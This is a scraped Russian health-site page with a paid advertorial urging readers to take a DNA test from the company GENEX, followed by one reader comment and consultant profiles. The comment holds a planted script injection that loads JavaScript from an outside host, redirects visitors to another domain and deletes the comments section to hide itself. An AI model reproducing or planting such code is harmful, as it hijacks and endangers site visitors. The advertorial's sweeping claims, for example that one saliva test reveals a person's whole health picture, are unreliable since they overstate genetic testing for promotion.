Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  6 причин сделать анализ Д...  >>  6 причин сделать анализ ДНК
 
Обратная связь
 

6 причин сделать анализ ДНК

Размер шрифта
09 ноября 2011 07:01
  • google_analytics: false
  • Нравится

Сделать комплексное генетическое обследование нужно всего 1 раз в жизни: геном человека не меняется. Достаточно взять анализ слюны, и весь человек – как на ладони.

1


  1. Инвестиции в будущее.

Никакая профилактика не учитывает индивидуальных особенностей человека. В то же время комплексное генетическое обследование дает полную картину здоровья и рассказывает о предрасположенности к заболеваниям.


  1. Не только диагностика.

ДНК-анализ, конечно, не заменит всех методов диагностики. Но, во-первых, пациент получит информацию о себе. Во-вторых, научит правильно использовать ресурсы организма. В-третьих, лечащий врач подберет лечение.


  1. До ста лет и больше.

Почему одни едят, что хотят, спят, когда хотят, и при этом не болеют, а другие питаются правильно, и все равно болеют как по расписанию?

Важным фактором раннего старения является оксидативный стресс, в частности, образование реактивных форм кислорода, в которые входят свободные радикалы и пероксиды, убивающие клетки. Выяснив, насколько хорошо организм справляется с токсичными продуктами, можно подобрать себе точную диету и не состариться раньше времени: допустим, есть больше цитрусовых.

Для профилактики старения необходим анализ генов предрасположенности к таким патологиям, как атеросклероз, воспаление, остеопороз, гипертония или нейродегенерация.


  1. Похудение с умом.

По данным Всемирной организации здравоохранения, каждый третий человек страдает избыточным весом. Причина – все те же гены. Значит ли это, что менять рацион вообще бесполезно, и похудеть не получится, если вам достались «неправильные» гены? Вовсе нет, если диета будет разработана врачом в соответствии с вашими генетическими особенностями.


  1. Не приговор, а руководство к действию.

Предрасположенность к раку, сердечно-сосудистым заболеваниям, сахарному диабету, возможные заболевания у будущих детей и способы предотвратить их развитие – обо всем этом расскажет ДНК-тест.

Тестирование на гены метаболизма лекарств позволит определять индивидуальную чувствительность к различным фармакологическим препаратам. Вы сможете подобрать точную дозировку лекарства.


  1. Генетическая диагностика в России.

В нашей стране ДНК-анализы проводятся американской компанией GENEX. Специально для тех, кто хочет похудеть, существует пакет генетического тестирования, анализирующий гены, ответственные за физическую форму. Ведущие медицинские генетики выявляют реакции организма на определенные продукты, физические упражнения, вычисляют вашу потребность в витаминах. Все это поможет в составлении индивидуальной диеты.

Сделайте тест на геном, ведь если человек предупрежден, значит, он вооружен.

Благодарим за консультацию Александра Кожевникова, врача-невролога высшей категории.

На правах рекламы

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:06

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.